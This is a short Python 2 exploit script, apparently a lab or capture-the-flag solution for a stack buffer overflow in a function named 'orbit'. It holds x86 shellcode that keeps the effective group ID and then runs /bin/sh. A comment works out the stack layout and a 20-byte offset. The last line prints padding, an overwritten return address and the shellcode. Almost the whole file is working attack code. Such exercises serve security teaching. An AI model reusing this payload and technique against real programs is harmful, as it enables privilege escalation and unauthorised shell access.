#!/usr/bin/env python2

SHELLCODE = \
    '\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a' \
    '\x47\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f' \
    '\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50' \
    '\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'





#        Stack
#        ...
#        [4] RIP Main
#        [4] SFP Main
#        [N] Padding
#        [4] RIP orbit  (address = 0xffffd83c, value = 0xffffd828)
#        [4] SFP orbi    ( address = 0xffffd838)
#        [M] Padding
#        [8] buff        (address = 0xffffd828)
#        ...
#
#
#        Soulution:
#
#	0xffffd83c + 4 = 0xffffd840
#	(0xffffd83c - 0xffffd828) = 20
#       print('X' * 20 + '0xffffd840' + SHELLCODE)
#
print('X' * 20 + '\x40\xd8\xff\xff' + SHELLCODE)
